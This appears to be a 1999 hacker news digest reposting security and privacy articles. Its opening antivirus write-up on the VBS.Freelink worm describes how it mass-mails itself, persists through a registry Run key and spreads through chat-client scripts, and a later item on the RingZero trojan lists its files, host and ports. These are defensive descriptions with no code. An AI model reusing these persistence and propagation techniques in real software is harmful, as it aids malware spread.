                     Common
          Detected on:
                     July 2, 1999
        Characteristics:
                     Trojan Horse, Worm




      Description 

      VBS.Freelink is a virus discovered in July 1999. Symantec AntiVirus
      Research Center has recently been receiving an increase in VBS.Freelink virus
      reports from our customers. To protect yourself from this virus, all Norton
      AntiVirus customers should ensure their virus definitions are up to date by
      using the LiveUpdate feature. In order to detect the VBS.Freelink virus, it is
      necessary to scan files with the VBS filename extension. It is recommended to
      use the options in NAV to scan "All files" rather than using the "Program Files"
      option. Please note that this may cause performance issues depending on the
      software, hardware and configurations you are using. Newer versions of
      Norton AntiVirus are shipped with scan "All files" as default configurations. If
      you choose only to scan "Program Files", please make sure that the
      configurations in Norton AntiVirus includes the "VBS" file extension as well as
      the following file extensions in the "Scanner" and "AutoProtect" options. 

      Recommended Extension List as of Oct 5, 1999: 

      386, ADT, BIN, CBT, CLA, COM, CPL, CSC, DLL, DOC, DOT, DRV,
      EXE, HTM, HTT, JS, MDB, MSO, OV?, POT, PPT, RTF, SCR, SHS,
      SYS, VBS, XL? 

      Technical Notes 

      VBS.Freelink is an encrypted worm that will work under Windows 98,
      Windows 2000 and all the other Windows supporting VB Scripting language.
      Once the worm is launched, it will use MS Outlook to automatically send an
      email with an attachment of itself. Similar to the Melissa virus, this worm uses
      MAPI calls to get user profiles from MS Outlook. The contents of the email
      generated by this worm are: 

           Subject: Check this

           Have fun with these links. Bye.

      When the attached file is executed, it will create the following two files: 

           C:\WINDOWS\LINKS.VBS
           C:\WINDOWS\SYSTEM\RUNDLL.VBS 

      It will also create a file called LINKS.VBS in the root of all network drives
      that are currently mapped. Next, the worm will modify the following registry to
      execute every time the machine boots up: 

           HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
           CurrentVersion\Run\Rundll=RUNDLL.VBS 

      After infecting a system, it will displays a dialog box title "Free XXX links"
      with following content: 

           This will add a shortcut to free XXX links on 
           your desktop. Do you want to continue.

      If the user selects yes, it will create a shortcut pointing to an adult web site. 

      It also searches for MIRC32.EXE and PIRCH98.EXE chat programs in
      C:\MIRC , C:\PIRCH98, C:\PROGRAM FILES and the sub directories of
      each of these directories. If it finds either of these programs, it will modify the
      corresponding SCRIPT.INI file or EVENTS.INI located in the same
      directory. These INI files will cause LINKS.VBS to be sent to other people
      during the IRC sessions. 



      Norton AntiVirus users can protect themselves from this worm by
      downloading the current virus definitions either through LiveUpdate or from
      the following webpage: 

      http://www.symantec.com/avcenter/download.html 

      Write-up by: Abid Hussain Oonwala
      October 5th, 1999

      @HWA

                                                                                  
17.0  Loyalty Cards are Not As Private As People Think 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evilwench 
      Just how private is the information gathered by
      Customer Loyalty Cards? We're talking about those
      bar-coded cards that give shoppers at supermarkets
      and other stores up to a 15 percent discount in return
      for tracking what you buy. Supermarkets say that the
      data they gather is never sold or divulged to third
      parties. A search warrant is another matter. If an
      ex-spouse wants to discover if your a good parent they
      can subpoena the supermarket records. And no one
      really knows how secure these databases are. 

      Nando Times
      http://www.techserver.com/noframes/story/0,2294,500046068-500075236-500169924-0,00.html
      
      Privacy concerns leave customers wary of grocery cards 

      Copyright  1999 Nando Media
      Copyright  1999 Scripps Howard News Service

      From Time to Time: Nando's in-depth look at the 20th century 

      By MARY DEIBEL 

      ARLINGTON, Va. (October 16, 1999 1:43 a.m. EDT http://www.nandotimes.com) 
      - Even though Safeway Club Card member Lois Diehl McDonley doesn't mind 
      others knowing her shopping habits, she has a tip for those who do: Pay 
      separately in       cash for purchases you want kept private and use the 
      discount card for the rest. 

      "It's your business if you don't want people knowing if you buy 
      cigarettes, alcohol, certain reading materials or some other item, but 
      those things don't usually get discounts anyway," says McDonley, a 
      57-year-old medical secretary and mother       of two. "Segregating your 
      goods the way you do if you run an errand for a neighbor or need a receipt 
      to be reimbursed at work not only protects your privacy, it messes up Big 
      Brother's data base," she says. 

      But Safeway says it doesn't sell or lease information about individual 
      club card customers. 

      "Privacy has never been an issue," says spokeswoman Karen Darnells from 
      company headquarters in Pleasanton, Calif. "Club card members and their 
      identities are kept strictly confidential" 

      It's the same at other grocery chains that see the bar-coded rewards cards 
      as a weapon in the battle for customer business in the $400-billion-a-year 
      grocery wars: The cards typically carry discounts of 15 percent or more on 
      specified goods       in return for customers letting the stores build 
      detailed personal profiles from their purchases. 

      "We have an absolutely strict policy that we do not share that information 
      with any third party," said Kroger spokesman Gary Rhodes. Kroger currently 
      is the top-selling supermarket in the nation. 

      However, Rhodes and spokesmen for other big markets, including No. 2 
      Albertson's, No. 3 Wal-Mart, No. 4 Safeway and No. 5 Ahold USA agree that 
      information can and will be surrendered to law enforcement authorities 
      armed with a court       order. 

      Nob Hill Foods in the San Francisco Bay area and Wild Oats natural food 
      stores out of Boulder, Colo., did away with loyalty cards in response to 
      customer surveys. 

      Privacy experts say there's nothing to keep loyalty card data secret from 
      a subpoena if someone is being sought in a criminal case or caught in a 
      child custody fight. 

      "You may innocently buy junk food, a pregnancy kit or over-the-counter 
      sleeping aids, but how would it look if you decided to run for the school 
      board or mayor 10 years from now?" says Judith DeCew, a Clark University 
      professor and author of       "In Pursuit of Privacy: Law, Ethics & the 
      Rise of Technology" (Cornell University Press, 1997. 

      "Whatever promises retailers make, nobody can be sure who has access to 
      their data warehouses, and that goes for all kinds of stores, not just 
      supermarkets," she says. 

      "Internet e-tailers are especially aggressive when collecting data on 
      customers: Look at how Amazon.com targets your book-buying and music 
      interests, and consider that it's setting itself up as a worldwide virtual 
      mall, and remember what       was made of Monica Lewinsky's book purchases 
      in the real world." 

      California last week became the first state in the nation to limit the 
      information that grocery stores can require as a condition for signing up 
      for reward cards: A new state law stops stores from requiring would-be 
      club card members to list       driver's license or Social Security 
      numbers. The statute also makes it illegal to rent or sell customer names, 
      even though stores say they don't as a matter of policy. 

      "Grocery shoppers will no longer have to risk their privacy to save a few 
      dollars on grocery purchases," California state Sen. Jackie Speier, D-Daly 
      City, says. 

      So far, federal authorities have been slow to safeguard shoppers' privacy. 
      What few steps they've taken include prohibitions on: 

      - Release of video rental lists after Robert Bork's viewing preferences 
      made it into press accounts in the midst of his failed 1987 Supreme Court 
      bid. 

      - Third-party interceptions of cell phone calls, which prompted a fine for 
      a Florida couple who passed on a taped conversation in which Rep. John 
      Boehner, R-Ohio, was overheard plotting strategy with fellow House 
      Republican leaders during       an attempted overthrow of then- House 
      Speaker Newt Gingrich of Georgia. 

      - Internet firms collecting personal data from youngsters. Anyone older 
      than 14, however, presumably is old enough to check a Web site's privacy 
      policy or look for labels such as those voluntarily adopted by the On-line 
      Privacy Alliance, to       which nearly 100 corporations and associations 
      belong. 

      Another voluntary privacy program is BBBOnLine, which just awarded its 
      100th privacy seal with more than 400 applications still in the pipeline. 
      BBBOnLine chief operating officer Robert Bodoff says firms that qualify 
      are banking on privacy       being good business for them and for their 
      customers and "helping to build confidence in on-line commerce." 

      Marketing expert Martha Rogers of Bowling Green University agrees: "The 
      future of one-to-one marketing in which a customer is willing to sell some 
      privacy in return for letting the retailer buy information about that 
      person's buying preferences       depends on building trust," she says. 

      Rogers adds that the relationship may involve getting Americans to "shop 
      in new ways: You can always slide what you don't want anyone to know 
      you're buying into a second shopping cart and forgo the discount." 

      If that advice sounds familiar, it's Lois Diehl McDonley's advice, too, 
      gleaned from years as a supermarket shopper. Take discounts if you want to 
      and skip them where you feel your privacy could be compromised, she says, 
      and, oh yes, "chill       out a little" in the bargain. 

      As she sees it, "Some people might be embarrassed, but I can't fathom 
      who'd be remotely interested in the stuff I buy." 

      Mary Deibel is a reporter for Scripps Howard News Service. 

      @HWA


18.0  Interview With the Cult of the Dead Cow 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by evenprime 
      Slashdot is hosting an email interview with the Cult of
      the Dead Cow. They will be gathering questions until
      this afternoon and then posting the responses on
      Friday. 

      The Cult of the Dead Cow
      http://www.cultdeadcow.com
      
      Slashdot
      http://slashdot.org/interviews/99/10/18/0939245.shtml
      
      @HWA
      
19.0  Amazon.com Hosts Crypto Challenge 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Kiad Arch'August 
      Amazon has posted an interesting challenge for home
      cryptography buffs. Break their code and win books,
      Lego Mindstorms, and bragging rights. 

      Amazon.com      
      http://www.amazon.com/exec/obidos/redirect?tag=thehackernewsnet&path=subst/promotions/crypto/crypto-contest.html
      
      Crack the Code Do You Have the Skills to Win the Contest? Welcome to 
      Amazon.com's Cryptography Contest, where you can test your decryption 
      skills and win a swell prize package chock full of geek goodies--signed 
      copies of four classic crypto books, and a brain-bending programmable 
      robot kit! You don't need any special math skills to decrypt the 
      messages--just good old-fashioned smarts and a little persistence.

      Cryptography is the art and science of secret messages. Since people first 
      set stylus to tablet, ciphers and codes have been used to conceal the 
      meaning of written text.       Cryptography played a vital role in 
      politics, business, and war throughout history, changing the fortunes of 
      Julius Caesar and Mary Queen of Scots, among others. Why, without 
      cryptography, the Allies might never have won World War II! These days, 
      cryptography is crucial in the everyday workings of our computers, from 
      e-mail encryption to secure financial transactions.

      Here at Amazon.com, we like to think of cryptography as a good, wholesome 
      activity, providing hours of fun for the whole family. But it's no fun if 
      no one gets the correct answer,       so if you're having trouble, check 
      back--we may post some hints to help you get started. Without further ado, 
      may we present the crypto-challenge. Happy solving!

      038-097-34-64-242-335-51-377-183-168       
      038-097-34-64-380-330-115-289-273-189-56 
      068-486-42-23-87-434-10-468-151-345-150-494-376-415-426 
      038-549-53-15-1-193-121-29-109-66-28-160-106 
      047-111-70-99-24-21-25-12-53-22-56-8

      --Code created by Alex Yan and Katherine Degelau

      The Payoff       Gee Whiz, Look at All This Keen Stuff! 

           Signed editions of Cryptonomicon, The Code Book, Between Silk and 
           Cyanide, and Applied Cryptography            A LEGO MindstormsTM 
           Robotics Invention System kit A chance to tell the world how you 
           solved the crypto puzzle! 

      How to Enter

         1.Send your answer, via e-mail, to crypto-contest@amazon.com.          
         2.Include the full finished translation of the puzzle, as well as your 
         full name and daytime telephone number. 3.Your entry (one per person, 
         please) must be received by 11:59 pm (PST) Friday, October 29, 1999, or 
         we won't be able to evaluate it. 4.Entries with the correct solution 
         will be entered into a random drawing, from which we will pick the 
         winner. 
         5.You must be a resident of the U.S. or Canada, excluding Quebec, to participate. 
         
      @HWA    

20.0  Web Sites Cause Crime, Report Says 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Q Bahl 
      Computer Economics, an independent research firm, has
      released a report blaming underground websites for the
      proliferation of computer crime. The damage caused by
      underground websites, they say, is estimated at over 1
      Trillion dollars a year world wide. 

      Yahoo News
      http://biz.yahoo.com/bw/991018/ca_compute_1.html
      
      Computer Economics      
      http://www.computereconomics.com
      
      Yahoo;
      
      Monday October 18, 9:03 am Eastern Time
      Company Press Release

      Computer Crime-Abetting Sites Will Dramatically Increase Costs for 
      Businesses and Consumers

      CARLSBAD, Calif.--(BUSINESS WIRE)--Oct. 18, 1999--Hacking and 
      computer-crime-abetting Web sites are supplying Web surfers with tools and 
      instructions that could cost consumers and businesses worldwide over a       
      trillion dollars this year. 

      Computer Economics research shows that hacking and computer crime will 
      experience a dramatic increase in the next few years due to the abundance 
      of Web sites devoted to these topics. Also factoring into the growth of       
      computer crime is the low cost of the tools and instructions that these 
      sites sell, and the rise of the wireless Internet. 

      ``The Internet has always been a haven for computer criminals,'' said 
      Computer Economics research analyst Adam Harriss. ``The technologically 
      savvy hackers have been online swapping tips and programming for decades, 
      but now the information is being       posted and sold at low cost in a 
      form that even the techno-illiterate can understand. Causing damage to 
      machines and infiltrating systems has become as easy as putting together a 
      child's Christmas toy.'' 

      While some hacker sites warn that the products they sell are to be used 
      for informational purposes only, other sites pander to malicious users, 
      and are growing a future generation of hackers by targeting children. The 
      proprietors of some hacking manuals tout       them as guides that help 
      users ``search for company secrets.'' Vendors of hacking hardware often 
      boast that their goods ``screw up all types of computer disks.'' Software 
      that could be used to pirate other programs is sometimes said to be ``a 
      must for anyone who doesn't want to pay full price for software.'' 

      Not only are these hacking tools priced very low, but many of the most 
      popular hacking tools, such as L0phtCrack, AntiSniff, nmap, and netcat are 
      free shareware. Manuals and software about hacking and computer crime 
      interests such as viruses,       counterfeiting, piracy, and various types 
      of fraud typically run from $8 to $60. 

      The following table shows a few examples of the types of information and 
      technology that is available for order at low prices on the Internet. 

      Computer Crime Instructions and Software Available Online 

           A manual that tells Microsoft users how to avoid the $10 $35 per 
           incident fee for tech support after the 90 days of free support has 
           run out.            Software and instructions to circumvent any 
           Internet $30 sites that are restricted by a ``parental block.'' 
           Software to remotely infiltrate the hard drives of $50 people in chat 
           rooms and copy their software. A disk containing over 4000 live 
           viruses including $42 CIA, Michaelangelo, JerusalemB, Dark Avenger, 
           Darth Vader, Kool Aid, AIDS, Rape, Keydrop, Null, and Quiet. 

      -- A guide to making a profit from software bootlegging. $8 

           Complete guide to hacking a Novell network. Software $25 and texts 
           are included.            Instructions about how to break into any 
           Eudora $30 account. 

      The low cost of computer crime software and hardware combined with the 
      dramatic expansion of the Internet into new, lesser-developed regions of 
      the world promises to exacerbate the hacking problem. There are roughly 
      three times as many people using       wireless phone services as there 
      are people on the Internet, so there is possibility for an online 
      explosion once a wireless Internet is established. With the expansion and 
      proliferation of the Internet in many countries with loose regulation of 
      computer crime and poorly organized law enforcement, hacking and computer 
      crime will flourish in the years to come. 

      Computer Economics is an independent research firm specializing in helping 
      IT decision makers plan, manage, and control IT costs through advisory 
      services, analyst support, an innovative Web site, and printed reports. 
      Based in Carlsbad, Calif., Computer       Economics serves 82 percent of 
      the Fortune 500. For further information, please visit the Web site at 
      http://www.computereconomics.com. 

      Contact: 

     Computer Economics Inc.
     Catherine Huneke, 760/438-8100, ext. 108 or 116
     chuneke@compecon.com
     http://www.computereconomics.com
     
     @HWA
     
21.0  China to Use Viruses During War 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by William Knowles 
      The People's Liberation Army of China is said to be
      preparing to fight a 'dirty war'. This includes terrorism,
      biochemical warfare, environmental damage and
      computer viruses in an effort to create political and
      economic crisis. 

      South China Morning Post
      http://www.scmp.com/News/China/Article/FullText_asp_ArticleID-19991018025207920.asp
      
      Monday, October 18, 1999
      'PLA has plan to destroy West's finance systems in dirty war'

      SIMON MACKLIN in London

      Chinese military strategists have developed plans to destroy Western 
      financial institutions in the event of a major conflict, according to a 
      report in a British newspaper.

      Senior members of the People's Liberation Army are said to be urging the 
      Government to abandon conventional defence strategies and prepare for a 
      "dirty war".

      The Sunday Telegraph yesterday said PLA officials were advocating 
      terrorism, biochemical warfare, environmental damage and computer viruses 
      as a means of throwing the West into political and economic crisis.

      The maverick officers maintained that the mainland must use such tactics 
      because it cannot hope to match the West's military might.

      Outlines of the plans have been revealed in books and newspaper articles 
      published on the mainland.

      The blueprints for the dirty war say the PLA should infiltrate and 
      sabotage key pillars of Western society, including banks and the public 
      sector, in a response to a direct threat of war.

      The officers argue that Beijing's attempts to upgrade its nuclear and 
      conventional arsenal to match America's are insufficient to prepare China 
      for conflict.

      The increasing global world economy is pinpointed as a weak point which 
      should be exploited, and the PLA officers write admiringly of US financier 
      George Soros, whose attacks on foreign currencies are seen as a template 
      for disrupting an enemy's economic       system.

      One recent article proposed that Beijing should set aside US$100 billion 
      (HK$775 billion) for such measures.

      A recently published book, Unrestricted War, says China must use every 
      weapon available to make itself equal to more developed countries.

      Another book by two PLA air force colonels lists 24 types of "dirty war" 
      that could be waged against the US and its allies.

      Colonel Qiao Liang, the author of a similar book, justified his eccentric 
      advice in a full-page newspaper article published in China.

      "All strong countries make rules while all rising ones break them and 
      exploit loopholes. Foreigners always rise by breaking the rules of 
      civilised and developed countries, which is what history is all about," he 
      wrote. 

      @HWA
      
22.0  Call for Public Security Database 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by no0ne 
      At the recent National Information Systems Security
      Conference speakers called for a publicly accessible
      database of uncovered modes of attack. The
      conference sponsored by the Commerce Department's
      National Institute of Standards and Technology (NIST)
      and the National Security Agency was attended by
      military and intelligence people and industry executives
      from all over the world in an effort to bond together
      against what they call "united attackers". (A public
      database is sure better than what numerous other
      agencies are proposing.) 

      San Jose Mercury News        
      http://www.mercurycenter.com/business/top/067614.htm



      Posted at 10:09 p.m. PDT Monday, October 18, 1999 

      Tech firms urged to unite
      against computer vandals

      BY DAVID L. WILSON
      Mercury News Washington Bureau 

      ARLINGTON, VA. -- The people who make it their business to
      protect secure computer systems from illicit penetration by outsiders
      agreed Monday they have something important to learn from the
      villains: pooling information.

      By sharing information with each other, computer vandals gain an
      enormous advantage over those who try to thwart them, according to
      experts at a high-level conference on computer security here Monday.
      They cited an urgent need to overcome a penchant for secrecy and do
      a better job sharing resources.

      ``By sharing we gain a tremendous amount, and by not sharing we're
      not keeping any secrets,'' argued Matt Bishop, an associate professor
      of computer science at the University of California-Davis and a
      prominent authority on computer security.

      The National Information Systems Security Conference -- sponsored
      by the Commerce Department's National Institute of Standards and
      Technology (NIST) and the National Security Agency -- brought
      industry executives together with military and intelligence researchers
      from around the world to strategize on the battle against ``the intruder
      community.''

      Wily ``crackers'' -- the black hats of the game -- break into
      computers systems to steal valuable information, eavesdrop and
      otherwise humiliate their prey, or simply engage in vandalism by
      erasing all the data on a supposedly secure hard drive. Others in this
      cyberspace demimonde -- call them white hats or ``hackers'' -- also
      test the security of computer systems, but with a benign intent: Their
      sport is to discover vulnerability and help plug holes.

      Members of both groups routinely exchange information via the
      Internet, with the black hats using the information to write ``tool kits,''
      or software that will automatically attack vulnerable computers. The
      white hats, meanwhile, use this information to alert computer system
      administrators of flaws in their security that must be repaired, and try
      to pressure commercial software developers to issue software
      ``patches'' to fix the holes.

      In this environment, systems administrators can be quickly
      overwhelmed, said Peter Mell, a scientist with NIST's computer
      security division. The information used by the attackers is fragmented
      and diffuse and cannot be verified easily. Members of the intruder
      community typically don't hold down conventional jobs and can
      devote long hours to planning a security breach.

      Large organizations can try to fend off such guerrilla tactics, Mell told
      the audience, `but it is so expensive to get this information, understand
      it and use it.''

      ```An attacker only has to find one way into your system,'' said
      Andrew Balinski, a security research engineer for networking giant
      Cisco Systems. ``A defender has to defend against all attacks.''

      Mell, Balinski and Bishop urged those at the conference to work
      toward pooling information they've uncovered on intruders' various
      modus operandi to create a publicly accessible databases. Such an
      effort would make computer security much more practical and
      effective for everyone, they said.

      Cooperating on a common defense may have its drawbacks,
      however, the speakers acknowledged. An open public database might
      offer one-stop shopping for information vandals. And some security
      professional would fear compromising their competitive advantage by
      sharing information. 

      Yet the defenders desperately need a system that can make it more
      cost effective to stay current on security threats, the experts argued. A
      good first step would be to develop a common framework to let
      researchers quickly classify attacks using standard descriptions. But
      even that won't be easy to accomplish.

      ``The attackers share a common goal,'' said Bishop, the UC Davis
      professor. ``We don't.'' 
      
      @HWA
      
      
23.0  GAO Calls for Security Laws 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Code Kid 
      With NIPC, CIAO, NIST, and even the Office of
      Management and Budget all legally tasked to define
      security standards for various government agencies the
      Government Accounting Office feels it is time for
      Congress to step in and pass some laws. The GAO is
      recommending that laws be passed to help direct these
      various security efforts to eliminate duplication and
      overlapping. 

      Federal Computer Week      
      http://www.fcw.com/pubs/fcw/1999/1018/fcw-pollaw-10-18-99.html
      
      OCTOBER 18, 1999 


      GAO: IT security law needed

      Law would help direct disparate security policies

      BY DIANE FRANK (diane_frank@fcw.com)

      Agencies have improved the security of many information systems, but the
      lack of clearly defined roles among agencies coordinating security has
      hindered federal security experts' ability to protect systems from intrusion,
      according to the General Accounting Office.

      Agencies have spent the past two years plugging security holes in computer
      systems, but it has been such an ad hoc effort that federal security managers
      have been left without any coordinated guidance on developing a fully secure
      government, GAO officials told the Senate Judiciary Technology, Terrorism
      and Government Information Subcommittee this month.

      To help pull together agencies' efforts, GAO recommended that Congress
      should consider passing legislation that would better define how lead
      organizations should work together and how agencies should follow their
      direction.

      "It's not so much that there needs to be one central organization in charge as
      the need for defining where each organization fits," said Jean Boltz, assistant
      director of governmentwide and defense information systems within GAO's
      Accounting and Information Management Division (AIMD). "I think this is an
      area where legislation should definitely be considered."

      Until recently, the authority to oversee computer security resided in two
      organizations. The Paperwork Reduction Act of 1995 gave security oversight
      authority to the Office of Management and Budget, while the Computer
      Security Act of 1987 gave authority to the National Institute of Standards and
      Technology.

      But last year, President Clinton issued Presidential Decision Directive 63,
      requiring agencies to protect their critical information systems from
      cyberattacks. While PDD 63 helped focus federal attention on growing
      information security threats, it also created several new groups, including the
      National Infrastructure Protection Center at the FBI and the Critical
      Infrastructure Assurance Office (CIAO) at the National Security Council.

      The organizations' overlapping -- and in some cases conflicting --
      responsibilities has led to duplicate efforts, such as developing
      governmentwide instead of agency-specific best-practices guidelines, which
      has confused agencies, according to GAO executives.

      "While these organizations have developed fundamentally sound policies and
      guidance and have undertaken potentially useful initiatives, effective
      improvements are not taking place," said Jack Brock, director of the AIMD
      office, testified before the subcommittee this month. 

      Some of the problems stem from the fact that the NIPC and the CIAO,
      formed in 1998, and the CIO Council, formed in 1997, are relatively new,
      and any new process or organization will need to iron out kinks, Brock said. 

      Still, some basic security issues must be solved soon, he said.

      "It is unclear how the activities of these many organizations interrelate, who
      should be held accountable for their success or failure and whether they will
      effectively and efficiently support national goals," Brock said.

      For agencies that are developing their own security plans under PDD 63 while
      complying with OMB regulations, it can be especially confusing getting
      guidance from so many places, Boltz said. 

      And the fact that some organizations' power is prescribed by law while others
      are given by PDD 63 or other executive orders leaves agencies wondering
      which orders are going.

      Some legislative changes are under way in Congress. The House Science
      Technology Subcommittee is working on the Computer Security Enhancement
      Act, a bill that would update NIST's role in the governmentwide security
      landscape. Others, including the Senate Government Affairs Committee, also
      have expressed interest in the issue of legislation.

      "There's a lot of interest and a lot of people looking at it right now," Boltz said.
      "It's really coming to fruition." 
      
      @HWA
      
      
24.0  RingZero Still on the Loose 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by toka25 
      HNN first mentioned this virus last week but now more
      information is available. RingZero was designed to
      search the internet for proxy servers. RingZero has been
      labeled a "quantum leap in distributed attack
      technology" by researchers. 

      CMP TechWeb
      http://www.techweb.com/wire/story/TWB19991013S0018
      
      Experts Fear Trojan Proxy Server
      Virus
      (10/13/99, 7:05 p.m. ET)
      By Lee Kimber, TechWeb 

      Security experts are trying to track down the
      perpetrators of a huge Internet surveillance
      operation that they say could presage an
      attack on websites around the world. 

      Members of the Bethesda, Md.-based System
      Administration, Networking, and Security (SANS)
      Institute have already identified over 200 copies of a
      Trojan virus called RingZero that scans Web proxy
      servers and relays its findings back to remote
      computers across the Internet. 

      That means information, including credit card numbers,
      and other private transaction information could be
      stolen. 

      Since SANS warned its 64,000 members to check for
      the Trojan after the first was discovered two weeks
      ago, its researchers have slowly pieced together
      frightening evidence of a systematic attempt to gather
      information from commercial proxy servers. Proxy
      servers are widely used by business to handle Web
      access on office networks. They host intranet websites,
      let administrators restrict the websites staff may visit and
      cut bandwidth costs. 

      Once installed on a network, RingZero's pst.exe file
      randomly scans for proxy servers and makes them send
      their own Internet address and port number to what
      appears to be a data collection script running on a
      machine at www.rusftpsearch.net. 

      Crackers use IP addresses and port numbers as a
      starting point for breaking into computers. 

      "It's a quantum leap in distributed attack technology,"
      said SANS security researcher John Green. "The proxy
      is being used to send its own IP address and proxy port
      home to the mothership." 

      But SANS researchers think RingZero has other
      abilities too. They found the Trojan has a second part,
      called its.exe, that tries to retrieve files directly from
      Web-servers. Both parts seem able to work
      independently of each other. The researchers are
      currently trying to determine what the file-retrieving
      component does with its booty. 

      SANS is asking network administrators to check their
      systems for files called pst.exe and its.exe. It also wants
      to hear from any administrator who sees outgoing
      network traffic on port 8080 and 3128. Seeing such
      traffic on a network that doesn't have a proxy server is
      a strong sign that they have been infected by the
      RingZero. 
      
      @HWA


25.0  MTV Called Inexcusable By ITC 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Space Rogue 
      The Independent Television Commission (ITC) has
      labelled the recent MTV show on Hackers as
      inexcusable. The show attempted to portray what
      hackers and hacking is all about. Instead MTV was
      taken for a ride by one of the people they profiled and
      MTV failed to verify any of the 'facts' presented to
      them. The end result being that the underground
      community was portrayed as a bunch of criminals with
      no redeemable qualities. 

      ZD Net 
      http://www.zdnet.co.uk/news/1999/41/ns-10798.html

      Emmanuel Goldstein and the staff of 2600 spent a large
      amount of energy with the MTV crew when it was
      thought that MTV wanted to do a story on Kevin
      Mitnick. As it turns out MTV evidently did not have
      enough time and cut out all references to Mitnick. 

      Emmanuel Goldstein's Comments 
      http://www.hackernews.com/orig/emmanuel.html

      Shamrock's Statement
      http://www.hackernews.com/orig/shamrock.html
      (See elsewhere this issue)
      
      HNN Reader Comments
      http://www.hackernews.com/orig/mtv.html
      
      MTV's True Life: I'm a Hacker 
      http://www.mtv.com/mtv/tubescan/truelife/
      
      ZDNet;
      
      MTV made to look ridiculous by fake hacker
     
      Tue, 19 Oct 1999 17:31:17 GMT Will Knight 

      TV channel's blinkered view of hackers enabled programme hoax 

      America's premier music television channel, MTV has been duped by a hoaxer 
      in its much-maligned "True Life: I'm a Hacker" programme. After the show 
      was screened in the US, the main character in the show, Shamrock, issued a       
      statement revealing that he made the whole thing up. 

      Shamrock, who last week gave an in-depth interview with MTV explaining the 
      motivation behind his hacking exploits, on Monday said the show was total 
      nonsense and was designed to illustrate how gullible MTV was. 

      In the statement, published on the Hacking News Network Shamrock explained 
      it was MTV's cynical approach to hacking that prompted his scam. "We 
      waited for months to see if they would be realistic and after it was 
      obvious that they       wouldn't, we figured the only option would be to 
      discredit them with as much fiction as possible." 

      Shamrock adds that he and fellow hoaxers never expected MTV to swallow the 
      absurdities they made up and argued the hoax illustrated the shallow 
      nature of the mainstream media. "We had no intention of making hackers 
      look bad. All I       can do is reiterate to you just how fake and hollow 
      what you see on television is. After this experience I wonder where if any 
      truth lies in what we are told to watch. This is the obvious issue the 
      hacker community needs to address." 

      Practising British hacker Harlequin, famed for defacing international 
      Websites, told ZDNet News the media is often guilty of misunderstanding 
      and misrepresenting hackers. He said: "Hacking and computer technology are 
      very complex       areas, both technically and socially. Naivety can 
      easily be exploited as well as accuracy." 

      A representative from the Independent Television Commission (ITC), the 
      British television industry's independent watchdog, said that it considers 
      this kind of blunder inexcusable. "This sort of thing is not difficult to 
      detect if you've done       your work properly. We would expect program 
      makers to do their work and to make things that are factually accurate." 

      Despite several attempts, ZDNet was unable to reach an MTV spokesperson. 
      
      Goldstein's comments;
      
      Submited By: Emmanuel Goldstein 

      I haven't had time to even begin to deal with this until now. So I'll be 
      as clear as possible. Our fears of what this show would be simply did not 
      do it justice. The reality was so much worse than any of the warnings we 
      started getting months ago. And the most troubling part of all this is 
      that so many people involved in this really knew better yet sensationalism 
      was allowed to run unchecked. 

      A little history to begin with. We at 2600 were approached by MTV back in 
      1998 when they expressed an interest in doing a hacker documentary, with 
      the Mitnick case being a focal point. For months after, we helped hook 
      them up with various people and spent a considerable amount of time 
      working with them and helping them however we could. 

      The first warnings of trouble came from an MTV intern who called into "Off 
      The Hook" on June 29 with the revelation that all references to Mitnick 
      had been eliminated and that the "documentary" was now going to focus 
      exclusively on three trendy teens instead of the people and issues that 
      were originally said to be the focus. 

      Even with this disturbing news, we told people to not pass judgement until 
      the thing had aired. Well, it's aired and now it's judgement day. 

      Right away, the show begins with such sensationalism and quotes meant to 
      scare the shit out of Joe America that I swear I could *smell* Geraldo. 
      "It's like being God." "If I had the opportunity to shut off all the power 
      in the city, would I do it?" "We want to know the location of every squad 
      car within the nearest vicinity [sic]." And finally, "What people don't 
      understand, they fear." Well, that's sure the theme of this half hour, 
      isn't it? MTV clearly didn't grasp what hackers are or maybe they just 
      didn't *want* to since anything that complex might confuse the audience 
      they know so well. And they certainly did their bit to spread fear 
      throughout the program with quotes like the above, with absolutely nothing 
      to show that this was anything other than teenage bravado. 

      Then the part that really pissed me off personally. Earlier this year, I 
      had asked the producers for one little thing in exchange for all the help 
      that I and other 2600 people had given them. President Clinton had given a 
      speech in January on computer hackers. We couldn't get the White House to 
      give us a video copy which we would have loved to use in our upcoming 
      documentary. I asked them if they could pull some strings and they said 
      they'd look into it. Last I heard they were having no success. And guess 
      what footage managed to show up in this program? That's right, the footage 
      they didn't even KNOW about which they obtained after all and kept for 
      themselves without a word to any of us! Fortunately there are other 
      networks who *do* live up to their promises and we've gotten the footage 
      from them. But this shows the sleaze factor at work in this kind of a 
      production. 

      "Never before have people so young had so much potential power to disrupt 
      the systems we all rely on." Please. Here we have the MTV age fixation 
      coupled with a blatant bit of hysteria with no factual basis to back it 
      up. Better get used to it as virtually none of the "facts" presented in 
      the next half hour will be researched or confirmed in any way. 

      "Chameleon faced off with one of America's most dangerous enemies." This 
      is basically Chameleon getting a piece of mail from someone he doesn't 
      know who lives overseas - at least that's all the details we're going to 
      get here. 

      "Shamrock - role model or renegade?" Yeah, that's the question that's been 
      plaguing the hacker world for years. 

      "Mantis - who says he can find out anything he wants about you." Just by 
      making such a claim, MTV will skip over all the proof and do a feature on 
      you as if everything you claim is true. Not one iota of evidence is ever 
      presented to back up this absurd bragging. 

      Now I want to point out that I don't personally have       anything 
      against any of the people who were portrayed in this program. They were 
